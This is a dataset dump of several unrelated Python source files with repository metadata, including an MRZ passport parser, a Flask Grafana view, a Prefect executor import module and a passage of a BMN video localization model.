dryobates/commit-message-from-test
|
41b4aa022f9432e6447e297b928d694835dc6495
|
[
"MIT"
] | 5
|
2019-09-27T19:52:50.000Z
|
2019-09-30T20:03:49.000Z
|
cmft/__init__.py
|
dryobates/commit-message-from-test
|
41b4aa022f9432e6447e297b928d694835dc6495
|
[
"MIT"
] | null | null | null |
from cmft.extract_from_python import extract_messages_from_python_file_diff
from cmft.extract_message import KNOWN_FILES
# Register the Python diff extractor so "py" files are routed to it by cmft.
KNOWN_FILES["py"] = extract_messages_from_python_file_diff
| 36.2
| 75
| 0.895028
| 28
| 181
| 5.25
| 0.428571
| 0.204082
| 0.204082
| 0.340136
| 0.44898
| 0.44898
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066298
| 181
| 4
| 76
| 45.25
| 0.869822
| 0
| 0
| 0
| 0
| 0
| 0.01105
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
cf0be9e148435bef347f7e16e36a1324579c180c
| 136
|
py
|
Python
|
home/hairygael/GESTURES/startkinect.py
|
rv8flyboy/pyrobotlab
|
4e04fb751614a5cb6044ea15dcfcf885db8be65a
|
[
"Apache-2.0"
] | 63
|
2015-02-03T18:49:43.000Z
|
2022-03-29T03:52:24.000Z
|
home/hairygael/GESTURES/startkinect.py
|
hirwaHenryChristian/pyrobotlab
|
2debb381fc2db4be1e7ea6e5252a50ae0de6f4a9
|
[
"Apache-2.0"
] | 16
|
2016-01-26T19:13:29.000Z
|
2018-11-25T21:20:51.000Z
|
home/hairygael/GESTURES/startkinect.py
|
hirwaHenryChristian/pyrobotlab
|
2debb381fc2db4be1e7ea6e5252a50ae0de6f4a9
|
[
"Apache-2.0"
] | 151
|
2015-01-03T18:55:54.000Z
|
2022-03-04T07:04:23.000Z
|
def startkinect():
    # Remap each shoulder servo's 0-180 input range onto the arm's physical
    # limits so kinect-driven poses stay safe (i01 is presumably the InMoov
    # robot service created by the enclosing MyRobotLab script — not visible
    # here; confirm before reuse).
    i01.leftArm.shoulder.map(0,180,-25,105)
    i01.rightArm.shoulder.map(0,180,-30,100)
    # Start mirroring the operator's tracked gestures onto the robot.
    i01.copyGesture(True)
| 19.428571
| 44
| 0.683824
| 21
| 136
| 4.428571
| 0.714286
| 0.236559
| 0.258065
| 0.322581
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.205128
| 0.139706
| 136
| 6
| 45
| 22.666667
| 0.589744
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0
| 0
| 0.25
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
cf438c1e6df5f904cdd702ca895623cd9d231d8e
| 11,664
|
py
|
Python
|
app/flaskapp/mrz_parser.py
|
Sagargajare/flask-docker-final
|
115cf02b7f1ae4fafdfa50a6ce09749a30c2f84a
|
[
"MIT"
] | null | null | null |
app/flaskapp/mrz_parser.py
|
Sagargajare/flask-docker-final
|
115cf02b7f1ae4fafdfa50a6ce09749a30c2f84a
|
[
"MIT"
] | null | null | null |
app/flaskapp/mrz_parser.py
|
Sagargajare/flask-docker-final
|
115cf02b7f1ae4fafdfa50a6ce09749a30c2f84a
|
[
"MIT"
] | null | null | null |
"""
Created on 03/01/2021
file: mrz_parser.py
description:
@author: Almoutaz
"""
class cardType():
    """Integer codes for the MRZ layouts recognised by mrzParser.getCardType.

    The mapping to line count / line length / leading character is defined
    in getCardType (presumably the ICAO 9303 TD1/TD2/TD3/visa formats —
    confirm against that spec).
    """
    nocard = -1   # unrecognised layout
    card_0 = 0    # 3 lines x 30 chars
    card_1 = 1    # 2 lines x 36 chars
    card_2 = 2    # 2 lines x 44 chars
    card_3 = 3    # 2 lines x 44 chars, first char 'V'
    card_4 = 4    # 2 lines x 36 chars, first char 'V'
def sub_string(line, start, end):
    """Slice line[start:end] and strip all '<' MRZ filler characters."""
    return line[start:end].replace('<', '')
def sub_string_with_space_replace(line, start, end):
    """Slice line[start:end], converting '<' MRZ fillers into spaces."""
    return line[start:end].replace('<', ' ')
def sub_string_without_replace(line, start, end):
    """Slice line[start:end] verbatim, keeping any '<' fillers."""
    return line[start:end]
class mrzParser():
    def __init__(self, lines):
        """Store the raw MRZ text and initialise every parsed field to ''.

        `lines` is the full machine-readable zone as one string with rows
        separated by '\r\n' (see getCardType / the analysisMRZ_* methods).
        """
        self.lines = lines
        self.passportType = ""
        self.countryCode = ""
        self.surname = ""
        self.givenname = ""
        self.passportNumber = ""
        self.passportChecksum = ""
        self.nationality = ""
        self.birthday = ""
        self.birthdayChecksum = ""
        self.sex = ""
        self.expirationDate = ""
        self.expirationChecksum = ""
        self.personalNumber = ""
        self.personalNumberChecksum = ""
        self.secondRowChecksum = ""
        self.optionalData = ""
        self.optionalData2 = ""
        # hash1..hash4 / final_hash hold the check-digit characters extracted
        # by the analysisMRZ_* methods (not verified here).
        self.hash1 = ""
        self.hash2 = ""
        self.hash3 = ""
        self.hash4 = ""
        self.final_hash = ""
def getCardType(self):
type = cardType.nocard
separated = self.lines.split('\r\n')
linecount = len(separated)
ch_num = len(separated[0])
first_ch = separated[0][0]
if linecount == 3 and ch_num == 30:
type = cardType.card_0
elif linecount == 2 and ch_num == 36:
if first_ch == "V" :
type == cardType.card_4
else:
type = cardType.card_1
elif linecount == 2 and ch_num == 44:
if first_ch == "V":
type = cardType.card_3
else:
type = cardType.card_2
return type
    def analysisMRZ_0(self):
        """Parse a 3-line x 30-char MRZ (cardType.card_0) into instance fields.

        Line 1: document type, issuing country, document number, check digit,
        optional data. Line 2: birth date, check digit, sex, expiry date,
        check digit, nationality, optional data, final check digit.
        Line 3: surname<<given names. Offsets presumably follow the ICAO
        TD1 layout — confirm against Doc 9303.
        """
        separated_lines = self.lines.split('\r\n')
        # line 1
        line_tmp = separated_lines[0]
        # document type
        self.passportType = sub_string(line_tmp, 0, 2)
        # country
        self.countryCode = sub_string(line_tmp, 2, 5)
        # document num
        self.passportNumber = sub_string(line_tmp, 5, 14)
        # hash1 (check digit over the document number)
        self.hash1 = sub_string(line_tmp, 14, 15)
        # optional data
        self.optionalData = sub_string(line_tmp, 15, 30)
        # line 2
        line_tmp = separated_lines[1]
        # date of birth, reformatted as YY/MM/DD with '/' separators
        self.birthday = sub_string(line_tmp, 0, 2) + '/' + sub_string(line_tmp, 2, 4) + '/' + sub_string(line_tmp, 4, 6)
        # hash2
        self.hash2 = sub_string(line_tmp, 6, 7)
        # gender
        self.sex = sub_string(line_tmp, 7, 8)
        # expire date, reformatted as YY/MM/DD
        self.expirationDate = sub_string(line_tmp, 8, 10) + '/' + sub_string(line_tmp, 10, 12) + '/' + sub_string( line_tmp, 12, 14)
        # hash3
        self.hash3 = sub_string(line_tmp, 14, 15)
        # nationality
        self.nationality = sub_string(line_tmp, 15, 18)
        # optional data 2
        self.optionalData2 = sub_string(line_tmp, 18, 29)
        # final hash
        self.final_hash = sub_string(line_tmp, 29, 30)
        # line 3: "SURNAME<<GIVEN<NAMES"; '<<' separates surname from given names
        line_tmp = separated_lines[2]
        sept_names = line_tmp.split('<<')
        if len(sept_names) >= 2:
            # last name
            self.surname = sub_string_with_space_replace(sept_names[0], 0, len(sept_names[0]))
            # given name
            self.givenname = sub_string_with_space_replace(sept_names[1], 0, len(sept_names[1]))
        else:
            # no '<<' found: treat the whole line as given name
            # last name
            self.surname = ""
            # given name
            self.givenname = sub_string(line_tmp, 0, 30)
        return
def analysisMRZ_1(self):
    """Parse a 2-line x 36-char MRZ into the instance fields.

    The offsets appear to follow the ICAO Doc 9303 TD2 layout — TODO
    confirm against the spec. Dates are stored as 'YY/MM/DD' strings.
    """
    separated_lines = self.lines.split('\r\n')
    # line 1
    line_tmp = separated_lines[0]
    # document type
    self.passportType = sub_string(line_tmp, 0, 2)
    # issuing country code
    self.countryCode = sub_string(line_tmp, 2, 5)
    # names field: surname and given names separated by '<<'
    name_line = sub_string_without_replace(line_tmp, 5, 36)
    sept_names = name_line.split('<<')
    if len(sept_names) >= 2:
        # last name
        self.surname = sub_string_with_space_replace(sept_names[0], 0, len(sept_names[0]))
        # given name
        self.givenname = sub_string_with_space_replace(sept_names[1], 0, len(sept_names[1]))
    else:
        # no '<<' separator found: keep the whole field as the given name
        self.surname = ""
        self.givenname = sub_string(line_tmp, 5, 36)
    # line 2
    line_tmp = separated_lines[1]
    # document number
    self.passportNumber = sub_string(line_tmp, 0, 9)
    # hash1: check digit over the document number
    self.hash1 = sub_string(line_tmp, 9, 10)
    # nationality
    self.nationality = sub_string(line_tmp, 10, 13)
    # date of birth, formatted YY/MM/DD
    self.birthday = sub_string(line_tmp, 13, 15) + '/' + sub_string(line_tmp, 15, 17) + '/' + sub_string(line_tmp,
                                                                                                         17, 19)
    # hash2: check digit over the birth date
    self.hash2 = sub_string(line_tmp, 19, 20)
    # gender
    self.sex = sub_string(line_tmp, 20, 21)
    # expiry date, formatted YY/MM/DD
    self.expirationDate = sub_string(line_tmp, 21, 23) + '/' + sub_string(line_tmp, 23, 25) + '/' + sub_string(
        line_tmp, 25, 27)
    # hash3: check digit over the expiry date
    self.hash3 = sub_string(line_tmp, 27, 28)
    # optional data
    self.optionalData = sub_string(line_tmp, 28, 35)
    # final (composite) check digit
    self.final_hash = sub_string(line_tmp, 35, 36)
    return
def analysisMRZ_2(self):
    """Parse a 2-line x 44-char MRZ into the instance fields.

    The offsets appear to follow the ICAO Doc 9303 TD3 (passport)
    layout — TODO confirm against the spec. Unlike the other layouts,
    positions 28-42 of line 2 hold a personal number with its own check
    digit (hash4).
    """
    separated_lines = self.lines.split('\r\n')
    # line 1
    line_tmp = separated_lines[0]
    # document type
    self.passportType = sub_string(line_tmp, 0, 2)
    # issuing country code
    self.countryCode = sub_string(line_tmp, 2, 5)
    # names field: surname and given names separated by '<<'
    name_line = sub_string_without_replace(line_tmp, 5, 44)
    sept_names = name_line.split('<<')
    if len(sept_names) >= 2:
        # last name
        self.surname = sub_string_with_space_replace(sept_names[0], 0, len(sept_names[0]))
        # given name
        self.givenname = sub_string_with_space_replace(sept_names[1], 0, len(sept_names[1]))
    else:
        # no '<<' separator found: keep the whole field as the given name
        self.surname = ""
        self.givenname = sub_string(line_tmp, 5, 44)
    # line 2
    line_tmp = separated_lines[1]
    # document number
    self.passportNumber = sub_string(line_tmp, 0, 9)
    # hash1: check digit over the document number
    self.hash1 = sub_string(line_tmp, 9, 10)
    # nationality
    self.nationality = sub_string(line_tmp, 10, 13)
    # date of birth, formatted YY/MM/DD
    self.birthday = sub_string(line_tmp, 13, 15) + '/' + sub_string(line_tmp, 15, 17) + '/' + sub_string(line_tmp, 17, 19)
    # hash2: check digit over the birth date
    self.hash2 = sub_string(line_tmp, 19, 20)
    # gender
    self.sex = sub_string(line_tmp, 20, 21)
    # expiry date, formatted YY/MM/DD
    self.expirationDate = sub_string(line_tmp, 21, 23) + '/' + sub_string(line_tmp, 23, 25) + '/' + sub_string(line_tmp, 25, 27)
    # hash3: check digit over the expiry date
    self.hash3 = sub_string(line_tmp, 27, 28)
    # personal number
    self.personalNumber = sub_string(line_tmp, 28, 42)
    # hash4: check digit over the personal number
    self.hash4 = sub_string(line_tmp, 42, 43)
    # final (composite) check digit
    self.final_hash = sub_string(line_tmp, 43, 44)
    return
def analysisMRZ_3(self):
    """Parse a 2-line x 44-char MRZ whose first character is 'V'.

    The offsets appear to follow the ICAO Doc 9303 MRV-A (visa) layout —
    TODO confirm against the spec. Visas carry no final composite check
    digit; positions 28-44 of line 2 are optional data.
    """
    separated_lines = self.lines.split('\r\n')
    # line 1
    line_tmp = separated_lines[0]
    # document type
    self.passportType = sub_string(line_tmp, 0, 2)
    # issuing country code
    self.countryCode = sub_string(line_tmp, 2, 5)
    # names field: surname and given names separated by '<<'
    name_line = sub_string_without_replace(line_tmp, 5, 44)
    sept_names = name_line.split('<<')
    if len(sept_names) >= 2:
        # last name
        self.surname = sub_string_with_space_replace(sept_names[0], 0, len(sept_names[0]))
        # given name
        self.givenname = sub_string_with_space_replace(sept_names[1], 0, len(sept_names[1]))
    else:
        # no '<<' separator found: keep the whole field as the given name
        self.surname = ""
        self.givenname = sub_string(line_tmp, 5, 44)
    # line 2
    line_tmp = separated_lines[1]
    # document number
    self.passportNumber = sub_string(line_tmp, 0, 9)
    # hash1: check digit over the document number
    self.hash1 = sub_string(line_tmp, 9, 10)
    # nationality
    self.nationality = sub_string(line_tmp, 10, 13)
    # date of birth, formatted YY/MM/DD
    self.birthday = sub_string(line_tmp, 13, 15) + '/' + sub_string(line_tmp, 15, 17) + '/' + sub_string(line_tmp,
                                                                                                         17, 19)
    # hash2: check digit over the birth date
    self.hash2 = sub_string(line_tmp, 19, 20)
    # gender
    self.sex = sub_string(line_tmp, 20, 21)
    # expiry date, formatted YY/MM/DD
    self.expirationDate = sub_string(line_tmp, 21, 23) + '/' + sub_string(line_tmp, 23, 25) + '/' + sub_string(
        line_tmp, 25, 27)
    # hash3: check digit over the expiry date
    self.hash3 = sub_string(line_tmp, 27, 28)
    # optional data
    self.optionalData = sub_string(line_tmp, 28, 44)
    return
def analysisMRZ_4(self):
    """Parse a 2-line x 36-char MRZ whose first character is 'V'.

    The offsets appear to follow the ICAO Doc 9303 MRV-B (visa) layout —
    TODO confirm against the spec. Visas carry no final composite check
    digit; positions 28-36 of line 2 are optional data.
    """
    separated_lines = self.lines.split('\r\n')
    # line 1
    line_tmp = separated_lines[0]
    # document type
    self.passportType = sub_string(line_tmp, 0, 2)
    # issuing country code
    self.countryCode = sub_string(line_tmp, 2, 5)
    # names field: surname and given names separated by '<<'
    name_line = sub_string_without_replace(line_tmp, 5, 36)
    sept_names = name_line.split('<<')
    if len(sept_names) >= 2:
        # last name
        self.surname = sub_string_with_space_replace(sept_names[0], 0, len(sept_names[0]))
        # given name
        self.givenname = sub_string_with_space_replace(sept_names[1], 0, len(sept_names[1]))
    else:
        # no '<<' separator found: keep the whole field as the given name
        self.surname = ""
        self.givenname = sub_string(line_tmp, 5, 36)
    # line 2
    line_tmp = separated_lines[1]
    # document number
    self.passportNumber = sub_string(line_tmp, 0, 9)
    # hash1: check digit over the document number
    self.hash1 = sub_string(line_tmp, 9, 10)
    # nationality
    self.nationality = sub_string(line_tmp, 10, 13)
    # date of birth, formatted YY/MM/DD
    self.birthday = sub_string(line_tmp, 13, 15) + '/' + sub_string(line_tmp, 15, 17) + '/' + sub_string(line_tmp,
                                                                                                         17, 19)
    # hash2: check digit over the birth date
    self.hash2 = sub_string(line_tmp, 19, 20)
    # gender
    self.sex = sub_string(line_tmp, 20, 21)
    # expiry date, formatted YY/MM/DD
    self.expirationDate = sub_string(line_tmp, 21, 23) + '/' + sub_string(line_tmp, 23, 25) + '/' + sub_string(
        line_tmp, 25, 27)
    # hash3: check digit over the expiry date
    self.hash3 = sub_string(line_tmp, 27, 28)
    # optional data
    self.optionalData = sub_string(line_tmp, 28, 36)
    return
def process(self):
    """Detect the card layout and run the matching MRZ parser.

    Returns:
        "error" when the layout is not recognised; otherwise None
        (the parser methods populate instance fields as a side effect).
    """
    dispatch = {
        cardType.card_0: self.analysisMRZ_0,
        cardType.card_1: self.analysisMRZ_1,
        cardType.card_2: self.analysisMRZ_2,
        cardType.card_3: self.analysisMRZ_3,
        cardType.card_4: self.analysisMRZ_4,
    }
    parser = dispatch.get(self.getCardType())
    if parser is None:
        return "error"
    parser()
| 34.005831
| 132
| 0.55024
| 1,439
| 11,664
| 4.216122
| 0.084086
| 0.15131
| 0.184276
| 0.224164
| 0.789023
| 0.774023
| 0.765123
| 0.725565
| 0.703643
| 0.671007
| 0
| 0.058601
| 0.34165
| 11,664
| 343
| 133
| 34.005831
| 0.731475
| 0.084791
| 0
| 0.565217
| 0
| 0
| 0.00605
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05314
| false
| 0.062802
| 0
| 0
| 0.140097
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
cf590a505947375a929427c3c8b53bf33126ffb9
| 193
|
py
|
Python
|
optimizer.py
|
yzy1015/Tensorflow_Template
|
35732cf13c66465b7924339a170005094f70ea61
|
[
"MIT"
] | null | null | null |
optimizer.py
|
yzy1015/Tensorflow_Template
|
35732cf13c66465b7924339a170005094f70ea61
|
[
"MIT"
] | null | null | null |
optimizer.py
|
yzy1015/Tensorflow_Template
|
35732cf13c66465b7924339a170005094f70ea61
|
[
"MIT"
] | null | null | null |
def update_lr(train_loss_history_var, config_var, train_loss_var):
    """Decide whether the learning rate should be decayed.

    Returns True when at least two losses have been recorded and the
    current loss exceeds the second-to-last recorded loss scaled by
    ``config_var.lr_decay_threshold``; False otherwise.
    """
    if len(train_loss_history_var) <= 1:
        return False
    reference_loss = train_loss_history_var[-2] * config_var.lr_decay_threshold
    return reference_loss < train_loss_var
| 96.5
| 126
| 0.818653
| 33
| 193
| 4.242424
| 0.454545
| 0.321429
| 0.342857
| 0.407143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.011364
| 0.088083
| 193
| 2
| 126
| 96.5
| 0.784091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
d858221ec33cc60c16f674b623f3d6675c432bfa
| 91
|
py
|
Python
|
game/combat/agent/agentrefo.py
|
Sipondo/ulix-dexflow
|
de46482fe08e3d600dd5da581f0524b55e5df961
|
[
"MIT"
] | 5
|
2021-06-25T16:44:38.000Z
|
2021-12-31T01:29:00.000Z
|
game/combat/agent/agentrefo.py
|
Sipondo/ulix-dexflow
|
de46482fe08e3d600dd5da581f0524b55e5df961
|
[
"MIT"
] | null | null | null |
game/combat/agent/agentrefo.py
|
Sipondo/ulix-dexflow
|
de46482fe08e3d600dd5da581f0524b55e5df961
|
[
"MIT"
] | 1
|
2021-06-25T20:33:47.000Z
|
2021-06-25T20:33:47.000Z
|
from .baseagent import BaseAgent
import numpy as np
class AgentRefo(BaseAgent):
    """Combat agent that currently inherits all behaviour from BaseAgent.

    NOTE(review): empty placeholder — presumably agent-specific logic is
    intended to be added here; confirm before relying on it.
    """
    pass
| 13
| 32
| 0.769231
| 12
| 91
| 5.833333
| 0.75
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.186813
| 91
| 6
| 33
| 15.166667
| 0.945946
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.25
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
2b13f715a5fda0c6aa55f4dd0e1e2445b98c6bf3
| 175
|
py
|
Python
|
src/prefect/engine/executors/__init__.py
|
concreted/prefect
|
dd732f5990ee2b0f3d816adb285168fd63b239e4
|
[
"Apache-2.0"
] | 8,633
|
2019-03-23T17:51:03.000Z
|
2022-03-31T22:17:42.000Z
|
src/prefect/engine/executors/__init__.py
|
concreted/prefect
|
dd732f5990ee2b0f3d816adb285168fd63b239e4
|
[
"Apache-2.0"
] | 3,903
|
2019-03-23T19:11:21.000Z
|
2022-03-31T23:21:23.000Z
|
src/prefect/engine/executors/__init__.py
|
ngriffiths13/prefect
|
7f5613abcb182494b7dc12159277c3bc5f3c9898
|
[
"Apache-2.0"
] | 937
|
2019-03-23T18:49:44.000Z
|
2022-03-31T21:45:13.000Z
|
from prefect.executors.base import Executor
from prefect.engine.executors.dask import DaskExecutor, LocalDaskExecutor
from prefect.engine.executors.local import LocalExecutor
| 43.75
| 73
| 0.874286
| 21
| 175
| 7.285714
| 0.571429
| 0.215686
| 0.222222
| 0.339869
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074286
| 175
| 3
| 74
| 58.333333
| 0.944444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
2b295d39678ae0a6c3b95c1e322e08e416274ae5
| 169
|
py
|
Python
|
rrd/view/portal/grafana.py
|
litian33/dashboard
|
0a5120ce5c5f1d6e371ea0f930100744d2894a83
|
[
"Apache-2.0"
] | null | null | null |
rrd/view/portal/grafana.py
|
litian33/dashboard
|
0a5120ce5c5f1d6e371ea0f930100744d2894a83
|
[
"Apache-2.0"
] | null | null | null |
rrd/view/portal/grafana.py
|
litian33/dashboard
|
0a5120ce5c5f1d6e371ea0f930100744d2894a83
|
[
"Apache-2.0"
] | null | null | null |
from rrd import app
from flask import render_template
@app.route("/thirdparty/grafana")
def grafana():
    """Render the embedded Grafana page at /thirdparty/grafana.

    NOTE(review): ``**locals()`` passes no variables here (the function
    defines none before the call) — presumably kept for consistency
    with other view functions; confirm.
    """
    return render_template("thirdparty/grafana.html", **locals())
| 28.166667
| 65
| 0.763314
| 22
| 169
| 5.772727
| 0.636364
| 0.220472
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106509
| 169
| 6
| 65
| 28.166667
| 0.84106
| 0
| 0
| 0
| 0
| 0
| 0.247059
| 0.135294
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
2b7a58b49285a971516873a7adda499e24225a53
| 169
|
py
|
Python
|
tests/test_version.py
|
LucaCappelletti94/pygifsicle
|
4f05d0eead3b002295212d985fdbc9ca8e7f4a8f
|
[
"MIT"
] | 42
|
2019-10-14T11:30:53.000Z
|
2022-03-28T06:55:20.000Z
|
tests/test_version.py
|
LucaCappelletti94/pygifsicle
|
4f05d0eead3b002295212d985fdbc9ca8e7f4a8f
|
[
"MIT"
] | 8
|
2019-10-13T02:54:19.000Z
|
2021-10-02T17:47:40.000Z
|
tests/test_version.py
|
LucaCappelletti94/pygifsicle
|
4f05d0eead3b002295212d985fdbc9ca8e7f4a8f
|
[
"MIT"
] | 8
|
2019-09-23T18:59:39.000Z
|
2022-02-25T22:38:44.000Z
|
from validate_version_code import validate_version_code
from pygifsicle.__version__ import __version__
def test_version():
    """Check that the package ``__version__`` string is a valid version code."""
    assert validate_version_code(__version__)
| 33.8
| 55
| 0.869822
| 21
| 169
| 6.095238
| 0.428571
| 0.351563
| 0.445313
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.094675
| 169
| 5
| 56
| 33.8
| 0.836601
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
9926096741d2447b9486d65b44e43d2d505d749a
| 46,671
|
py
|
Python
|
mmaction/models/localizers/bmn.py
|
wangqixun/VideoTemporalDetectionZeroShot
|
b23bad0a83d4d1fca210a838b8309e016bcc3a14
|
[
"Apache-2.0"
] | null | null | null |
mmaction/models/localizers/bmn.py
|
wangqixun/VideoTemporalDetectionZeroShot
|
b23bad0a83d4d1fca210a838b8309e016bcc3a14
|
[
"Apache-2.0"
] | null | null | null |
mmaction/models/localizers/bmn.py
|
wangqixun/VideoTemporalDetectionZeroShot
|
b23bad0a83d4d1fca210a838b8309e016bcc3a14
|
[
"Apache-2.0"
] | null | null | null |
import math
import numpy as np
import torch
import torch.nn as nn
from ...localization import temporal_iop, temporal_iou
from ..builder import LOCALIZERS, build_loss
from .base import BaseLocalizer
from .utils import post_processing
from rich import print
import transformers
from transformers import AutoModel
from transformers import AutoTokenizer, AutoConfig
from collections import OrderedDict
import os
import copy
@LOCALIZERS.register_module()
class BMN(BaseLocalizer):
    """Boundary Matching Network for temporal action proposal generation.

    Please refer `BMN: Boundary-Matching Network for Temporal Action Proposal
    Generation <https://arxiv.org/abs/1907.09702>`_.
    Code Reference https://github.com/JJBOY/BMN-Boundary-Matching-Network

    Args:
        temporal_dim (int): Total frames selected for each video.
        boundary_ratio (float): Ratio for determining video boundaries.
        num_samples (int): Number of samples for each proposal.
        num_samples_per_bin (int): Number of bin samples for each sample.
        feat_dim (int): Feature dimension.
        soft_nms_alpha (float): Soft NMS alpha.
        soft_nms_low_threshold (float): Soft NMS low threshold.
        soft_nms_high_threshold (float): Soft NMS high threshold.
        post_process_top_k (int): Top k proposals in post process.
        feature_extraction_interval (int):
            Interval used in feature extraction. Default: 16.
        loss_cls (dict): Config for building loss.
            Default: ``dict(type='BMNLoss')``.
        hidden_dim_1d (int): Hidden dim for 1d conv. Default: 256.
        hidden_dim_2d (int): Hidden dim for 2d conv. Default: 128.
        hidden_dim_3d (int): Hidden dim for 3d conv. Default: 512.
    """
    def __init__(self,
                 temporal_dim,
                 boundary_ratio,
                 num_samples,
                 num_samples_per_bin,
                 feat_dim,
                 soft_nms_alpha,
                 soft_nms_low_threshold,
                 soft_nms_high_threshold,
                 post_process_top_k,
                 feature_extraction_interval=16,
                 loss_cls=dict(type='BMNLoss'),
                 hidden_dim_1d=256,
                 hidden_dim_2d=128,
                 hidden_dim_3d=512):
        # NOTE(review): super(BaseLocalizer, ...) deliberately skips
        # BaseLocalizer.__init__ and calls its parent instead — presumably
        # to bypass BaseLocalizer's backbone/cls_head setup; confirm.
        super(BaseLocalizer, self).__init__()
        self.tscale = temporal_dim
        self.boundary_ratio = boundary_ratio
        self.num_samples = num_samples
        self.num_samples_per_bin = num_samples_per_bin
        self.feat_dim = feat_dim
        self.soft_nms_alpha = soft_nms_alpha
        self.soft_nms_low_threshold = soft_nms_low_threshold
        self.soft_nms_high_threshold = soft_nms_high_threshold
        self.post_process_top_k = post_process_top_k
        self.feature_extraction_interval = feature_extraction_interval
        self.loss_cls = build_loss(loss_cls)
        self.hidden_dim_1d = hidden_dim_1d
        self.hidden_dim_2d = hidden_dim_2d
        self.hidden_dim_3d = hidden_dim_3d
        # Precompute self.sample_mask used by _boundary_matching_layer.
        self._get_interp1d_mask()
        # Base Module: shared 1D-conv stem over the temporal feature sequence.
        self.x_1d_b = nn.Sequential(
            nn.Conv1d(
                self.feat_dim,
                self.hidden_dim_1d,
                kernel_size=3,
                padding=1,
                groups=4), nn.ReLU(inplace=True),
            nn.Conv1d(
                self.hidden_dim_1d,
                self.hidden_dim_1d,
                kernel_size=3,
                padding=1,
                groups=4), nn.ReLU(inplace=True))
        # Temporal Evaluation Module: per-frame start/end probabilities.
        self.x_1d_s = nn.Sequential(
            nn.Conv1d(
                self.hidden_dim_1d,
                self.hidden_dim_1d,
                kernel_size=3,
                padding=1,
                groups=4), nn.ReLU(inplace=True),
            nn.Conv1d(self.hidden_dim_1d, 1, kernel_size=1), nn.Sigmoid())
        self.x_1d_e = nn.Sequential(
            nn.Conv1d(
                self.hidden_dim_1d,
                self.hidden_dim_1d,
                kernel_size=3,
                padding=1,
                groups=4), nn.ReLU(inplace=True),
            nn.Conv1d(self.hidden_dim_1d, 1, kernel_size=1), nn.Sigmoid())
        # Proposal Evaluation Module: confidence map over (duration, start).
        self.x_1d_p = nn.Sequential(
            nn.Conv1d(
                self.hidden_dim_1d,
                self.hidden_dim_1d,
                kernel_size=3,
                padding=1), nn.ReLU(inplace=True))
        self.x_3d_p = nn.Sequential(
            nn.Conv3d(
                self.hidden_dim_1d,
                self.hidden_dim_3d,
